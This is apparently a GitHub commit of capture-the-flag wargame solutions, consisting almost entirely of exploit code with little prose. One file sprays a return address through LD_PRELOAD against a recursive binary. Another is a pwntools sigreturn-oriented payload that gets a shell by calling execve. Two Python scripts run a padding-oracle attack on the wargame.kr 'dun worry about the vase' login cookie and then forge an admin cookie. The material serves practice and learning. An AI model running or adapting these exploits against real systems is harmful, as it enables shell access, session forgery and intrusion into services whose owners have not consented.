File tree 7 files changed +134
-0
lines changed
wargame.kr/dun worry about the vase
7 files changed +134
-0
lines changed Original file line number Diff line number Diff line change 1+ # main()
2+ int a;
3+ scanf("%d", &a);
4+ jump(a);
5+
6+ # jump(t)
7+ while (t > 0) {
8+ --t;
9+ jump(t);
10+ }
11+
12+ jmp 스택 내부 쓰레기값
13+
14+
15+ 0x080486f7
16+ export LD_PRELOAD=`perl -e 'print "\xf7\x86\x04\x08"x12345'`
Original file line number Diff line number Diff line change 1+ from pwn import *
2+
3+ # make symbolic link GNU -> /bin/sh
4+
5+ payload = ''
6+
7+ payload += 'a' * 16
8+
9+ payload += p64 (0x7fffffffe900 ) # ebp
10+ payload += p64 (0x0000000000400430 ) # read plt
11+ payload += p64 (0x0000000000400560 ) # syscall
12+
13+ # Frame
14+ context .clear (arch = 'x86_64' )
15+ frame = SigreturnFrame ()
16+ frame .rax = 59
17+ frame .rdi = 0x400280 # GNU
18+ frame .rsi = 0
19+ frame .rdx = 0
20+ frame .rip = 0x400560
21+ frame .csgsfs = 0x2b0033
22+
23+ payload += str (frame )
24+
25+ '''
26+ rax = 59
27+ rdi = 0x400280 # GNU
28+ rsi = 0
29+ rax = 0
30+ rbx = 0
31+ rcx = 0
32+ rdx = 0
33+ rbp = 0
34+ rsp = 0
35+ rip = 0x400560
36+ csgsfs = 0x2b0033
37+
38+ payload += ''
39+ payload += p64(0xdeadbeefdeadbeef) * 5
40+ payload += p64(0) * 8
41+ payload += p64(rdi) + p64(rsi) + p64(rbp) + p64(rbx)
42+ payload += p64(rdx) + p64(rax) + p64(rcx) + p64(rsp)
43+ payload += p64(rip)
44+ payload += p64(0)
45+ payload += p64(csgsfs)
46+ payload += p64(0) * 6
47+ '''
48+
49+ payload += '_' * (1295 - len (payload ))
50+
51+ payload += '$' * 15
52+
53+ f = open ('input' , 'w' )
54+ f .write (payload )
55+ f .close ()
Original file line number Diff line number Diff line change 1+ import base64
2+ import urllib .parse
3+
4+ inter = b'0\x83 \xb3 \xc2 n\xe6 P\x8a '
5+
6+ key1 = "7SWDHbawgDM="
7+ key2 = "kLcd9rHjAU8="
8+
9+ key1 = bytearray (base64 .b64decode (key1 ))
10+ key2 = bytearray (base64 .b64decode (key2 ))
11+
12+ def print_key ():
13+ print (urllib .parse .quote_plus (base64 .b64encode (key1 ) + base64 .b64encode (key2 )))
14+
15+ for i in range (8 ):
16+ print (inter [7 - i ] ^ key1 [i ], chr (inter [7 - i ] ^ key1 [i ]))
17+
18+ admin = b'admin\x03 \x03 \x03 '
19+ for i in range (8 ):
20+ key1 [i ] = inter [7 - i ] ^ admin [i ]
21+
22+ print_key ()
Original file line number Diff line number Diff line change 1+ import base64
2+ import urllib .parse
3+ import requests
4+
5+ URL = "http://wargame.kr:8080/dun_worry_about_the_vase/main.php"
6+
7+ key1 = "7SWDHbawgDM="
8+ key2 = "kLcd9rHjAU8="
9+
10+ key1 = bytearray (base64 .b64decode (key1 ))
11+ key2 = bytearray (base64 .b64decode (key2 ))
12+
13+ def send ():
14+ cookie_val = urllib .parse .quote_plus (base64 .b64encode (key1 )+ base64 .b64encode (key2 ))
15+ r = requests .post (URL , cookies = dict (L0g1n = cookie_val ))
16+ return r .text
17+
18+ def success (current , result ):
19+ if current == 0 :
20+ return "invalid user" in result
21+ else :
22+ return "padding" not in result
23+
24+ send ()
25+
26+ found = bytearray (b'12345678' )
27+
28+ for current in range (8 ):
29+ for prev in range (current ):
30+ key1 [7 - prev ] = found [prev ] ^ (current + 1 )
31+ for bit in range (256 ):
32+ if bit % 16 == 0 :
33+ print ("trying - %d byte - %d" % (current , bit ))
34+ key1 [7 - current ] = bit
35+ result = send ()
36+ if success (current , result ):
37+ found [current ] = bit ^ (current + 1 )
38+ print ("success - %d byte - %d" % (current , bit ^ (current + 1 )))
39+ break
40+
41+ print (found )
You can’t perform that action at this time.
0 commit comments